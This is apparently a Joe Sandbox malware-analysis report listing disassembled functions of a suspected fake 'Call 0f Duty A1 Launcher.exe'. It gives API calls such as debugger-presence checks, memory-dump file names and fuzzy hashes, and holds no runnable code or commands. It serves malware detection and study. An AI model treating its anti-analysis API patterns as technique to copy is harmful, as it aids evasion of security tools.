Function 006C5444 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006C5450
IsDebuggerPresent.KERNEL32 ref: 006C551C
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 006C553C
UnhandledExceptionFilter.KERNEL32(?), ref: 006C5546

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: cb0f828f566d0e1fc165e1460df8255fb873b9c1800992fa3505a16f38f981c0
Instruction ID: 0eef99cb8f4c28cf753447987f8a962271fa6ca91bcee1225882df9923367125
Opcode Fuzzy Hash: cb0f828f566d0e1fc165e1460df8255fb873b9c1800992fa3505a16f38f981c0
Instruction Fuzzy Hash: 94310775D062189BDB50EFA4DD89BCDBBF9EF08304F1040AAE40DAB251EB709A85CF55

Function 006C7DCA Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 006C7EC2
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 006C7ECC
UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 006C7ED9

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 53f8abd3113907f32609c27fcdf3ba895f00747a5c043ce2eae0af7434fa5198
Instruction ID: 91e1dfbe944d705331a6b0a71d50caeb83aa4a7d4cdb7f5460664fe0bae4789d
Opcode Fuzzy Hash: 53f8abd3113907f32609c27fcdf3ba895f00747a5c043ce2eae0af7434fa5198
Instruction Fuzzy Hash: E831B1759012289BCB61DF24DC89BD9BBB9FF08310F5041EAE41CA7251EB709F858F54

Function 006C15A0 Relevance: 4.4, APIs: 2, Instructions: 1444COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 006C2437

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: ___std_exception_destroy
String ID:
API String ID: 4194217158-0
Opcode ID: 8ab89f956e21dd0cb277aba4becbee66848b6b554dec10b81ff1ca728c10a086
Instruction ID: 00f8555e463d1256a6114908367a6fba73faa1c67f6108c49c0a4f0cdb8e4e69
Opcode Fuzzy Hash: 8ab89f956e21dd0cb277aba4becbee66848b6b554dec10b81ff1ca728c10a086
Instruction Fuzzy Hash: 1FA26966A555844FEB024AB884B93DF6FE24B6B730F6A2755C6F06F2D3D50B000B9B60

Function 006BD7F0 Relevance: 2.6, Strings: 1, Instructions: 1327COMMONLIBRARYCODE

Download Yara Rule

Strings

-g}5, xrefs: 006BD8D2

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID:
String ID: -g}5
API String ID: 0-4071012034
Opcode ID: 567013c6bcfcec0ed984ede7dc98578dd9fcade33fdd7421d722b80fb3fb8ae4
Instruction ID: 8ea8807034bc4fccb2784d9b4586b8f85d958b0e1939b7b23fdcef5b5a28780f
Opcode Fuzzy Hash: 567013c6bcfcec0ed984ede7dc98578dd9fcade33fdd7421d722b80fb3fb8ae4
Instruction Fuzzy Hash: 4D9299A6A556C45FEF024AB8D4A93DF6FF24B6B331F6E2B5586E01F2D3C507004A9B10

Function 006D1FD2 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,006D1F2D,?,?,00000008,?,?,006D1AFF,00000000), ref: 006D21FF

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: cedc832e9b5cb0ddd6865a8cd850511f2ba99cf02ac444bde6fd4d07f98c2912
Instruction ID: e12bee59aeb64cfb9dd2a9737be7b12ef9bafb134d931f504bdee9efef9d371c
Opcode Fuzzy Hash: cedc832e9b5cb0ddd6865a8cd850511f2ba99cf02ac444bde6fd4d07f98c2912
Instruction Fuzzy Hash: E6B18D3191060A9FD715CF28C89ABA47BE2FF55324F25C259E999CF3A1C335DA82CB40

Function 006C5200 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006C5216

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 566eb3291d128a0b353ca183f496aad1b379b50dbf08db62136d6b92fb543d78
Instruction ID: bbf4282cf3b9ed63da971586431ccc84352aaced95c3a27989768c024cec5af9
Opcode Fuzzy Hash: 566eb3291d128a0b353ca183f496aad1b379b50dbf08db62136d6b92fb543d78
Instruction Fuzzy Hash: 5D515971D1265A8FDB15CF54D881BAAB7F2FB48350F24952ED406EB350E3B4A940CF90

Function 006BF4D0 Relevance: 1.6, Strings: 1, Instructions: 329COMMONLIBRARYCODE

Download Yara Rule

Strings

k#fz, xrefs: 006BF718

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID:
String ID: k#fz
API String ID: 0-1948189604
Opcode ID: 4d01969b8c7478f929a4a958de43dc9422d73e4569bf4881ae646b391872ce71
Instruction ID: e5f25891da5aea1fcdd92e3478adcb48a8a8484e03882b62794cf85180c433ea
Opcode Fuzzy Hash: 4d01969b8c7478f929a4a958de43dc9422d73e4569bf4881ae646b391872ce71
Instruction Fuzzy Hash: CED121B2E115188FDB54CFBDC94069DB7F2AB48720F2A8369E875FB2D4D63499418B80

Function 006C5438 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00015560), ref: 006C543D

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: eefefd46084ec6d86df3edac817336df16886298047df7a276047c2b83167269
Instruction ID: 0c77950d3a2f710c6e781b7ada777abc860d7fecf01b243a516bfb7449227279
Opcode Fuzzy Hash: eefefd46084ec6d86df3edac817336df16886298047df7a276047c2b83167269
Instruction Fuzzy Hash:

Function 006C9F90 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 006C9F90

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 7feff8f90f9c4eb5f8035ed38ade6937c6f50b514580e7fca80bf4583230858d
Instruction ID: 1fde6011840cccd9feae1e0bfe53bafd446cf8b0864753d801f5d6be015394ff
Opcode Fuzzy Hash: 7feff8f90f9c4eb5f8035ed38ade6937c6f50b514580e7fca80bf4583230858d
Instruction Fuzzy Hash: 35A00170E432068BDB809F76AF0921A3BEBAA856A2705A0AAA405C5261EA349455DB11

Function 006B86C0 Relevance: .7, Instructions: 725COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71154a1930fc2315ccb80b21b7535e3f0a7830279197253a72698aaff11504a6
Instruction ID: 0c6f9da338cfa484394137450b0f6ceeaacd13697140d180bf19ef2a2b2a21da
Opcode Fuzzy Hash: 71154a1930fc2315ccb80b21b7535e3f0a7830279197253a72698aaff11504a6
Instruction Fuzzy Hash: 6732C276E446844FEB018ABCC4A53DF6FF24B6B334F2A2729C5A46F3D6D917440A8B50

Function 006C34D0 Relevance: .6, Instructions: 607COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0baa515746910fd5aa79794a5bae178b1369db83d50abec4b47443cc081bdf94
Instruction ID: 9031cd8783babd9bb2bbf0c4534f405674ce6d676468cdf26d452dc574d270d9
Opcode Fuzzy Hash: 0baa515746910fd5aa79794a5bae178b1369db83d50abec4b47443cc081bdf94
Instruction Fuzzy Hash: 3F02B377A916504FEF01497CC8B83DB1BE387A7735E2A6726CAB05B3E2C55B000E9B50

Function 006BF980 Relevance: .5, Instructions: 456COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f044fb9362481d53d9d05bd14e737e3cd80bc72ec7aede87821531eddb32df6c
Instruction ID: f8e79d2c93c1f9e083c9712bfe87875e22d05be9c0a78aff134d8a3f190d0fc0
Opcode Fuzzy Hash: f044fb9362481d53d9d05bd14e737e3cd80bc72ec7aede87821531eddb32df6c
Instruction Fuzzy Hash: 46E10972A505504FDF008A7CC8A93DF2FE2476B334F2A2726D9B46F7E2D657044A9B50

Function 006BBD50 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40787bf34683cad09e0dfed7488aa681f090402aba2062415861faf14844aa71
Instruction ID: 69e44e8c50ed16e0a1da8a0b89e85c858be4901ae828c42ce012eb3791b08e54
Opcode Fuzzy Hash: 40787bf34683cad09e0dfed7488aa681f090402aba2062415861faf14844aa71
Instruction Fuzzy Hash: 2BD06C3A645A58AFC310CF49E840D41F7A9FB89670B164466EA0893B20C331F811CAE0

Function 006C90D3 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 006C91F2
___TypeMatch.LIBVCRUNTIME ref: 006C9300
CatchIt.LIBVCRUNTIME ref: 006C9351
_UnwindNestedFrames.LIBCMT ref: 006C9452
CallUnexpected.LIBVCRUNTIME ref: 006C946D

Strings

81m, xrefs: 006C91E9
@]l, xrefs: 006C926D, 006C9275
csm, xrefs: 006C917D
csm, xrefs: 006C9229
csm, xrefs: 006C9110

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: 81m$@]l$csm$csm$csm
API String ID: 4119006552-926957316
Opcode ID: 787a90d51a5a1912c954df37cd3eb5491cd16af618686c734f22099c54396fa2
Instruction ID: 1d4b87fdb8e68272982cb6ce47e7132fc7743d9e4f56ff722185605ead04e9c6
Opcode Fuzzy Hash: 787a90d51a5a1912c954df37cd3eb5491cd16af618686c734f22099c54396fa2
Instruction Fuzzy Hash: B3B16A31800209EFCF28DFA4C889EBEB7B6FF14310B15815EE8156B252D735DA52CBA5

Function 006C6130 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 006C6167
___except_validate_context_record.LIBVCRUNTIME ref: 006C616F
_ValidateLocalCookies.LIBCMT ref: 006C61F8
__IsNonwritableInCurrentImage.LIBCMT ref: 006C6223
_ValidateLocalCookies.LIBCMT ref: 006C6278

Strings

csm, xrefs: 006C620D
^l, xrefs: 006C6215, 006C621E, 006C622F

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: ^l$csm
API String ID: 1170836740-664566743
Opcode ID: dbe6328ad358ed2c762e176530ef7687eb17a315157158ee3c12af76b1504dc6
Instruction ID: c2836527ddeb5e77d73d8cb8c29309e68daf02467e2daaee37e76af8995d611c
Opcode Fuzzy Hash: dbe6328ad358ed2c762e176530ef7687eb17a315157158ee3c12af76b1504dc6
Instruction Fuzzy Hash: 8A41B134A00218EBCF10DF69C884FAEBBA2EF05314F18815DF8156B392D735AA01CB99

Function 006D0308 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,006D02F3,?,?,?,?,?,?,?,?,?), ref: 006D03AE
__alloca_probe_16.LIBCMT ref: 006D0469
__alloca_probe_16.LIBCMT ref: 006D04F8
__freea.LIBCMT ref: 006D0543
__freea.LIBCMT ref: 006D0549
__freea.LIBCMT ref: 006D057F
__freea.LIBCMT ref: 006D0585
__freea.LIBCMT ref: 006D0595

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: f789d9664c22535a6f23ba785d5e6ff90e0f165505a4c39b42aa5c6844ab5dfc
Instruction ID: a28e8d7fa784a6538b6f62941b04d6d7f9ace793b003fd1abb2226b323dcb251
Opcode Fuzzy Hash: f789d9664c22535a6f23ba785d5e6ff90e0f165505a4c39b42aa5c6844ab5dfc
Instruction Fuzzy Hash: A971A272D00246ABEF219E64A942FFE7BBBDF49310F29015AED05A7341E735DD008BA4

Function 006C883A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,006C8831,006C5F0D,006C55A4), ref: 006C8848
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006C8856
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006C886F
SetLastError.KERNEL32(00000000,006C8831,006C5F0D,006C55A4), ref: 006C88C1

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 874eb10f6f0fe3f4078cb2048a6d9d6dfaef318011a23badae629e28c4a19ef8
Instruction ID: fd480d046bf93d4f9cb2b0bc2c895ace52f61c0cbbaf4cac4ef17af0e5c2e286
Opcode Fuzzy Hash: 874eb10f6f0fe3f4078cb2048a6d9d6dfaef318011a23badae629e28c4a19ef8
Instruction Fuzzy Hash: 9701D43261B2119EEB742AB4BC86FBE2797EB517B4361133EF010866E5EF118C01A254

Function 006CCB54 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe, xrefs: 006CCB70

Memory Dump Source

Source File: 00000000.00000002.1663459365.00000000006B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006B0000, based on PE: true

Associated: 00000000.00000002.1663438527.00000000006B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663487737.00000000006D3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663510366.00000000006DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663530565.00000000006DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663548215.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663571723.00000000006E1000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6b0000_Call 0f Duty A1 Launcher.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\Call 0f Duty A1 Launcher.exe
API String ID: 0-3876332877
Opcode ID: 486935cfb1cd336aed43b83f7ede7ced895d3eea0729a7f38aae30f1c1a7f060
Instruction ID: e38ea1a5ea57201fb17bc11631cd18cc3d6ad9c2b07cfc6c31ed9c99cb6b81f4
Opcode Fuzzy Hash: 486935cfb1cd336aed43b83f7ede7ced895d3eea0729a7f38aae30f1c1a7f060
Instruction Fuzzy Hash: 59216F71600205AFDB20AFA99D82FBA77ABEF543B4B10452DF82DD7651D730EC419BA0

Function 006C6F54 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,C362B542,?,?,00000000,006D25EB,000000FF,?,006C7015,00000002,?,006C70B1,006C83A0), ref: 006C6F89
